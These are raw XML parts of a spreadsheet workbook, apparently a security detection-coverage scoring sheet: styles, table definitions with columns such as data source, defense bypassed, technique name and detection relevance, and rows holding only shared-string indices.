    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Rated" xfId="1" xr:uid="{00000000-0005-0000-0000-000001000000}"/>
  </cellStyles>
  <dxfs count="59">
    <dxf>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alignment horizontal="center" vertical="center" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="thin">
          <color theme="4"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="0"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="left"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onsolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="1" formatCode="0"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>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border diagonalUp="0" diagonalDown="0">
        <right style="thin">
          <color indexed="64"/>
        </right>
        <top/>
        <bottom/>
        <vertical/>
        <horizontal/>
      </border>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border outline="0">
        <top style="thin">
          <color rgb="FF4472C4"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor rgb="FF000000"/>
          <bgColor rgb="FFFFFFFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="0"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="general"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border outline="0">
        <top style="thin">
          <color rgb="FF4472C4"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor rgb="FF000000"/>
          <bgColor rgb="FFFFFFFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="0"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="general"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border outline="0">
        <top style="thin">
          <color theme="4"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="1"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor indexed="65"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="0"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="general"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onsolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="1" formatCode="0"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>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onsolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="1" formatCode="0"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>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onsolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="1" formatCode="0"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FF0C1B33"/>
      <color rgb="FF2C578C"/>
      <color rgb="FF1F3F64"/>
      <color rgb="FF76AA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1048576" totalsRowShown="0" headerRowDxfId="58" dataDxfId="57">
  <autoFilter ref="A1:F1048576" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F431">
    <sortCondition ref="A115"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="DataSource"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="Event"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="Completeness" dataDxfId="56"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0000-000004000000}" name="Timeliness" dataDxfId="55"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0000-000005000000}" name="Availability" dataDxfId="54"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0000-000006000000}" name="Score" dataDxfId="53"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="1"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C5532A2-843C-47DF-8608-1466651A1023}" name="Table14" displayName="Table14" ref="A1:I1048576" totalsRowShown="0" headerRowDxfId="52" dataDxfId="51">
  <autoFilter ref="A1:I1048576" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{5A8720A1-C4EB-4D0F-9A10-2011CE69087A}" name="ID"/>
    <tableColumn id="2" xr3:uid="{1E99F361-759C-4633-BACD-3FFC8CED1432}" name="Name"/>
    <tableColumn id="9" xr3:uid="{E928A876-2831-406D-8E43-A73A9528B778}" name="Use case"/>
    <tableColumn id="7" xr3:uid="{19D66E15-B044-46E3-83C4-CA08ED9B9AEC}" name="Data source(s) used"/>
    <tableColumn id="8" xr3:uid="{A3F96FA2-6DB9-42F4-9011-DF134312E2B0}" name="Data score"/>
    <tableColumn id="3" xr3:uid="{7EE17FA3-339C-434B-97E1-23CD4A5A9E21}" name="Coverage" dataDxfId="50"/>
    <tableColumn id="4" xr3:uid="{17304CFF-50C1-4FEB-99C2-32C5EE0ECAED}" name="Upkeep" dataDxfId="49"/>
    <tableColumn id="5" xr3:uid="{8635D406-78FF-4BE8-B4BD-48C37E937BD2}" name="Confidence" dataDxfId="48"/>
    <tableColumn id="6" xr3:uid="{3C661D09-CA29-4A4B-B230-56DCCFA19FF2}" name="Score" dataDxfId="47"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="1"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89868F-CFDF-4D5D-A585-261BD5FB0287}" name="Table146" displayName="Table146" ref="A1:F1048576" totalsRowShown="0" headerRowDxfId="46" dataDxfId="45">
  <autoFilter ref="A1:F1048576" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F431">
    <sortCondition ref="A2"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{8AB82587-94D4-4AA1-9FB6-31106CE4302C}" name="Defense"/>
    <tableColumn id="7" xr3:uid="{EDE90456-9684-4217-8A11-A405B9599223}" name="Rationale"/>
    <tableColumn id="3" xr3:uid="{19AE8B58-514C-404B-A8CD-B45DACA75EC5}" name="Coverage" dataDxfId="44"/>
    <tableColumn id="4" xr3:uid="{DFBFDEDA-4648-4B35-A108-AFF953BE19D6}" name="Maintainability" dataDxfId="43"/>
    <tableColumn id="5" xr3:uid="{84BB3A79-F357-43BB-970F-876AE111E776}" name="Confidence" dataDxfId="42"/>
    <tableColumn id="6" xr3:uid="{81F9B949-1125-4DD9-944D-CC65168A336D}" name="Score" dataDxfId="41"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="1" showRowStripes="1"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G599" totalsRowShown="0" headerRowDxfId="40" dataDxfId="39" tableBorderDxfId="38">
  <autoFilter ref="A1:G599" xr:uid="{00000000-0009-0000-0100-000004000000}">
    <filterColumn colId="0">
      <colorFilter dxfId="0"/>
    </filterColumn>
  </autoFilter>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0200-000001000000}" name="ID" dataDxfId="37"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0200-000002000000}" name="Data Sources" dataDxfId="1"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0200-000003000000}" name="Weight" dataDxfId="36"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0200-000004000000}" name="Datasources" dataDxfId="35"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0200-000005000000}" name="Weights" dataDxfId="34"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0200-000006000000}" name="94,67" dataDxfId="33"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0200-000007000000}" name="Technique Name" dataDxfId="32"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="1"/>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9CCB65E-2C54-5545-AA30-1154A22B876C}" name="Table48" displayName="Table48" ref="A1:G1048576" totalsRowShown="0" headerRowDxfId="31" dataDxfId="30" tableBorderDxfId="29">
  <autoFilter ref="A1:G1048576" xr:uid="{00000000-0009-0000-0100-000004000000}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{02562021-0EBD-CC44-A120-6DDC902112D6}" name="ID" dataDxfId="28"/>
    <tableColumn id="2" xr3:uid="{E4FA407A-D868-5948-A86A-3E7C21459D22}" name="Data Source" dataDxfId="27"/>
    <tableColumn id="3" xr3:uid="{133E9531-97AF-AE46-9810-F86F5EDF1B4E}" name="Weight" dataDxfId="26"/>
    <tableColumn id="4" xr3:uid="{88548EC0-A39A-D644-89DB-109E9E72A752}" name="Datasources" dataDxfId="25"/>
    <tableColumn id="5" xr3:uid="{31F6B13E-093D-7148-82A3-73E841D209D9}" name="Weights" dataDxfId="24"/>
    <tableColumn id="6" xr3:uid="{20D93E48-3636-8E44-826B-E16EA3C44275}" name=" " dataDxfId="23"/>
    <tableColumn id="7" xr3:uid="{6C0A5336-E287-5A44-AA9C-78123FDB5740}" name="Items in Refence vs Items in this sheet" dataDxfId="22"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="1"/>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8F8F007-C03B-4FBB-B311-98A235E66082}" name="Table47" displayName="Table47" ref="A1:G1048576" totalsRowShown="0" headerRowDxfId="21" dataDxfId="20" tableBorderDxfId="19">
  <autoFilter ref="A1:G1048576" xr:uid="{00000000-0009-0000-0100-000004000000}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{95C2B4CB-8944-46C1-A8C8-7A0515F45D8C}" name="ID" dataDxfId="18"/>
    <tableColumn id="2" xr3:uid="{5F2F7F9F-839F-4CD8-8D50-D885AE10D42F}" name="Defense Bypassed" dataDxfId="17"/>
    <tableColumn id="3" xr3:uid="{2B56273F-EC15-4C41-9D11-A1D8408F30ED}" name="Weight" dataDxfId="16"/>
    <tableColumn id="4" xr3:uid="{8C8D49D6-D39D-4C99-BB1E-440A8282C9F0}" name="Datasources" dataDxfId="15"/>
    <tableColumn id="5" xr3:uid="{18B33E85-082C-4981-9E2B-9D50609487B9}" name="Weights" dataDxfId="14"/>
    <tableColumn id="6" xr3:uid="{9CEA5C68-2610-49D7-BB50-F591E746B86B}" name=" " dataDxfId="13"/>
    <tableColumn id="7" xr3:uid="{F2F9713F-9D15-46A4-B360-30E30FB09F2D}" name="Items in Refence vs Items in this sheet" dataDxfId="12"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="1"/>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FD3787E-1F44-485A-A8A9-8A85D79BF754}" name="Table149" displayName="Table149" ref="A1:G1048576" totalsRowShown="0" headerRowDxfId="11" dataDxfId="10">
  <autoFilter ref="A1:G1048576" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{E48BB814-60C2-4871-BAD1-E759BECD6686}" name="ID"/>
    <tableColumn id="2" xr3:uid="{11631B41-4E72-45BA-8ECA-AF9793FAE537}" name="Name"/>
    <tableColumn id="8" xr3:uid="{F4727FDB-BF23-417C-B827-D6E18D705A68}" name="Data score" dataDxfId="9">
      <calculatedColumnFormula>LOOKUP(A2,'REF-DataSources'!A:C)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="3" xr3:uid="{2026F669-B4E9-4263-8D48-D471D5FF0485}" name="Alerting" dataDxfId="8"/>
    <tableColumn id="4" xr3:uid="{55925F3A-D5C3-4914-BF47-8534DE4D940C}" name="Hunting" dataDxfId="7"/>
    <tableColumn id="5" xr3:uid="{D3B86A9C-223C-4BF7-A7B4-F9FFDDD583C3}" name="Forensics" dataDxfId="6"/>
    <tableColumn id="6" xr3:uid="{6134569F-8BFE-4B2D-8876-B96C7F7D78C4}" name="Score" dataDxfId="5"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="1" showRowStripes="1" showColumnStripes="1"/>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E1048575" totalsRowShown="0" headerRowDxfId="4" tableBorderDxfId="3">
  <autoFilter ref="A1:E1048575" xr:uid="{00000000-0009-0000-0100-000002000000}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:E198">
    <sortCondition ref="A1:A1048575"/>
  </sortState>
  <tableColumns count="5">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0100-000002000000}" name="EventID" dataDxfId="2"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0100-000003000000}" name="Event Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0100-000004000000}" name="Log Name"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0100-000005000000}" name="Verbosity Signal"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0100-000006000000}" name="Detection Relevance"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1"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13"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="22.6640625" customWidth="1"/>
    <col min="2" max="2" width="27.33203125" customWidth="1"/>
    <col min="3" max="3" width="141.33203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="24.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="27" t="s">
        <v>2894</v>
      </c>
      <c r="B1" s="7"/>
      <c r="C1" s="7"/>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A2" s="21"/>
      <c r="B2" s="21"/>
      <c r="C2" s="21"/>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="16" t="s">
        <v>2895</v>
      </c>
      <c r="B3" s="16"/>
      <c r="C3" s="16"/>
    </row>
    <row r="4" spans="1:3" ht="27" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A4" s="22" t="s">
        <v>2896</v>
      </c>
      <c r="B4" s="20" t="s">
        <v>2897</v>
      </c>
      <c r="C4" s="23" t="s">
        <v>2898</v>
      </c>
    </row>
    <row r="5" spans="1:3" ht="27" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A5" s="22" t="s">
        <v>2899</v>
      </c>
      <c r="B5" s="20" t="s">
        <v>2897</v>
      </c>
      <c r="C5" s="20" t="s">
        <v>2900</v>
      </c>
    </row>
    <row r="6" spans="1:3" ht="27" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A6" s="22" t="s">
        <v>2901</v>
      </c>
      <c r="B6" s="20" t="s">
        <v>2897</v>
      </c>
      <c r="C6" s="20" t="s">
        <v>2902</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="22"/>
      <c r="B7" s="20"/>
      <c r="C7" s="20"/>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="16" t="s">
        <v>2903</v>
      </c>
      <c r="B8" s="16"/>
      <c r="C8" s="16"/>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="22" t="s">
        <v>39</v>
      </c>
      <c r="B9" s="20" t="s">
        <v>2904</v>
      </c>
      <c r="C9" s="20" t="s">
        <v>2905</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="20"/>
      <c r="B10" s="20"/>
      <c r="C10" s="20" t="s">
        <v>2906</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="8"/>
      <c r="B11" s="8"/>
      <c r="C11" s="8"/>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="8"/>
      <c r="B12" s="8"/>
      <c r="C12" s="8"/>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="8"/>
      <c r="B13" s="8"/>
      <c r="C13" s="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569"/>
  <sheetViews>
    <sheetView topLeftCell="A410" workbookViewId="0">
      <selection activeCell="A2" sqref="A2:A569"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="9.1640625" defaultRowHeight="12" x14ac:dyDescent="0.15"/>
  <cols>
    <col min="1" max="1" width="9.1640625" style="13" customWidth="1"/>
    <col min="2" max="2" width="54.6640625" style="13" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="124" style="13" customWidth="1"/>
    <col min="4" max="4" width="25.5" style="13" customWidth="1"/>
    <col min="5" max="5" width="99.83203125" style="13" customWidth="1"/>
    <col min="6" max="6" width="50.33203125" style="13" customWidth="1"/>
    <col min="7" max="7" width="40.83203125" style="13" customWidth="1"/>
    <col min="8" max="12" width="9.1640625" style="13" customWidth="1"/>
    <col min="13" max="16384" width="9.1640625" style="13"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A1" s="53" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="53" t="s">
        <v>406</v>
      </c>
      <c r="C1" s="53" t="s">
        <v>38</v>
      </c>
      <c r="D1" s="53" t="s">
        <v>529</v>
      </c>
      <c r="E1" s="53" t="s">
        <v>530</v>
      </c>
      <c r="F1" s="53" t="s">
        <v>531</v>
      </c>
      <c r="G1" s="53" t="s">
        <v>532</v>
      </c>
      <c r="H1" s="53" t="s">
        <v>400</v>
      </c>
    </row>
    <row r="2" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A2" s="53" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="53" t="s">
        <v>533</v>
      </c>
      <c r="C2" s="53" t="s">
        <v>534</v>
      </c>
      <c r="D2" s="53" t="s">
        <v>535</v>
      </c>
      <c r="E2" s="53" t="s">
        <v>536</v>
      </c>
      <c r="F2" s="53" t="s">
        <v>537</v>
      </c>
      <c r="G2" s="53" t="s">
        <v>538</v>
      </c>
      <c r="H2" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A3" s="53" t="s">
        <v>540</v>
      </c>
      <c r="B3" s="53" t="s">
        <v>541</v>
      </c>
      <c r="C3" s="53" t="s">
        <v>534</v>
      </c>
      <c r="D3" s="53" t="s">
        <v>535</v>
      </c>
      <c r="E3" s="53" t="s">
        <v>542</v>
      </c>
      <c r="F3" s="53" t="s">
        <v>543</v>
      </c>
      <c r="G3" s="53" t="s">
        <v>538</v>
      </c>
      <c r="H3" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A4" s="53" t="s">
        <v>544</v>
      </c>
      <c r="B4" s="53" t="s">
        <v>545</v>
      </c>
      <c r="C4" s="53" t="s">
        <v>534</v>
      </c>
      <c r="D4" s="53" t="s">
        <v>535</v>
      </c>
      <c r="E4" s="53" t="s">
        <v>542</v>
      </c>
      <c r="F4" s="53" t="s">
        <v>546</v>
      </c>
      <c r="G4" s="53" t="s">
        <v>538</v>
      </c>
      <c r="H4" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A5" s="53" t="s">
        <v>547</v>
      </c>
      <c r="B5" s="53" t="s">
        <v>548</v>
      </c>
      <c r="C5" s="53" t="s">
        <v>534</v>
      </c>
      <c r="D5" s="53" t="s">
        <v>549</v>
      </c>
      <c r="E5" s="53" t="s">
        <v>542</v>
      </c>
      <c r="F5" s="53" t="s">
        <v>550</v>
      </c>
      <c r="G5" s="53" t="s">
        <v>538</v>
      </c>
      <c r="H5" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A6" s="53" t="s">
        <v>48</v>
      </c>
      <c r="B6" s="53" t="s">
        <v>551</v>
      </c>
      <c r="C6" s="53" t="s">
        <v>552</v>
      </c>
      <c r="D6" s="53" t="s">
        <v>553</v>
      </c>
      <c r="E6" s="53" t="s">
        <v>554</v>
      </c>
      <c r="F6" s="53" t="s">
        <v>555</v>
      </c>
      <c r="G6" s="53" t="s">
        <v>556</v>
      </c>
      <c r="H6" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A7" s="53" t="s">
        <v>557</v>
      </c>
      <c r="B7" s="53" t="s">
        <v>558</v>
      </c>
      <c r="C7" s="53" t="s">
        <v>559</v>
      </c>
      <c r="D7" s="53" t="s">
        <v>560</v>
      </c>
      <c r="E7" s="53" t="s">
        <v>561</v>
      </c>
      <c r="F7" s="53" t="s">
        <v>562</v>
      </c>
      <c r="G7" s="53" t="s">
        <v>556</v>
      </c>
      <c r="H7" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A8" s="53" t="s">
        <v>563</v>
      </c>
      <c r="B8" s="53" t="s">
        <v>564</v>
      </c>
      <c r="C8" s="53" t="s">
        <v>559</v>
      </c>
      <c r="D8" s="53" t="s">
        <v>560</v>
      </c>
      <c r="E8" s="53" t="s">
        <v>565</v>
      </c>
      <c r="F8" s="53" t="s">
        <v>566</v>
      </c>
      <c r="G8" s="53" t="s">
        <v>556</v>
      </c>
      <c r="H8" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A9" s="53" t="s">
        <v>567</v>
      </c>
      <c r="B9" s="53" t="s">
        <v>568</v>
      </c>
      <c r="C9" s="53" t="s">
        <v>569</v>
      </c>
      <c r="D9" s="53" t="s">
        <v>560</v>
      </c>
      <c r="E9" s="53" t="s">
        <v>570</v>
      </c>
      <c r="F9" s="53" t="s">
        <v>571</v>
      </c>
      <c r="G9" s="53" t="s">
        <v>556</v>
      </c>
      <c r="H9" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A10" s="53" t="s">
        <v>572</v>
      </c>
      <c r="B10" s="53" t="s">
        <v>573</v>
      </c>
      <c r="C10" s="53" t="s">
        <v>574</v>
      </c>
      <c r="D10" s="53" t="s">
        <v>560</v>
      </c>
      <c r="E10" s="53" t="s">
        <v>575</v>
      </c>
      <c r="F10" s="53" t="s">
        <v>576</v>
      </c>
      <c r="G10" s="53" t="s">
        <v>556</v>
      </c>
      <c r="H10" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A11" s="53" t="s">
        <v>577</v>
      </c>
      <c r="B11" s="53" t="s">
        <v>578</v>
      </c>
      <c r="C11" s="53" t="s">
        <v>579</v>
      </c>
      <c r="D11" s="53" t="s">
        <v>560</v>
      </c>
      <c r="E11" s="53" t="s">
        <v>580</v>
      </c>
      <c r="F11" s="53" t="s">
        <v>581</v>
      </c>
      <c r="G11" s="53" t="s">
        <v>556</v>
      </c>
      <c r="H11" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A12" s="53" t="s">
        <v>582</v>
      </c>
      <c r="B12" s="53" t="s">
        <v>583</v>
      </c>
      <c r="C12" s="53" t="s">
        <v>584</v>
      </c>
      <c r="D12" s="53" t="s">
        <v>560</v>
      </c>
      <c r="E12" s="53" t="s">
        <v>585</v>
      </c>
      <c r="F12" s="53" t="s">
        <v>586</v>
      </c>
      <c r="G12" s="53" t="s">
        <v>556</v>
      </c>
      <c r="H12" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A13" s="53" t="s">
        <v>587</v>
      </c>
      <c r="B13" s="53" t="s">
        <v>588</v>
      </c>
      <c r="C13" s="53" t="s">
        <v>589</v>
      </c>
      <c r="D13" s="53" t="s">
        <v>590</v>
      </c>
      <c r="E13" s="53" t="s">
        <v>591</v>
      </c>
      <c r="F13" s="53" t="s">
        <v>592</v>
      </c>
      <c r="G13" s="53" t="s">
        <v>556</v>
      </c>
      <c r="H13" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A14" s="53" t="s">
        <v>593</v>
      </c>
      <c r="B14" s="53" t="s">
        <v>594</v>
      </c>
      <c r="C14" s="53" t="s">
        <v>539</v>
      </c>
      <c r="D14" s="53" t="s">
        <v>590</v>
      </c>
      <c r="E14" s="53" t="s">
        <v>595</v>
      </c>
      <c r="F14" s="53" t="s">
        <v>596</v>
      </c>
      <c r="G14" s="53" t="s">
        <v>556</v>
      </c>
      <c r="H14" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A15" s="53" t="s">
        <v>51</v>
      </c>
      <c r="B15" s="53" t="s">
        <v>597</v>
      </c>
      <c r="C15" s="53" t="s">
        <v>598</v>
      </c>
      <c r="D15" s="53" t="s">
        <v>535</v>
      </c>
      <c r="E15" s="53" t="s">
        <v>599</v>
      </c>
      <c r="F15" s="53" t="s">
        <v>600</v>
      </c>
      <c r="G15" s="53" t="s">
        <v>601</v>
      </c>
      <c r="H15" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A16" s="53" t="s">
        <v>53</v>
      </c>
      <c r="B16" s="53" t="s">
        <v>602</v>
      </c>
      <c r="C16" s="53" t="s">
        <v>603</v>
      </c>
      <c r="D16" s="53" t="s">
        <v>560</v>
      </c>
      <c r="E16" s="53" t="s">
        <v>604</v>
      </c>
      <c r="F16" s="53" t="s">
        <v>605</v>
      </c>
      <c r="G16" s="53" t="s">
        <v>606</v>
      </c>
      <c r="H16" s="53" t="s">
        <v>607</v>
      </c>
    </row>
    <row r="17" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A17" s="53" t="s">
        <v>54</v>
      </c>
      <c r="B17" s="53" t="s">
        <v>608</v>
      </c>
      <c r="C17" s="53" t="s">
        <v>609</v>
      </c>
      <c r="D17" s="53" t="s">
        <v>560</v>
      </c>
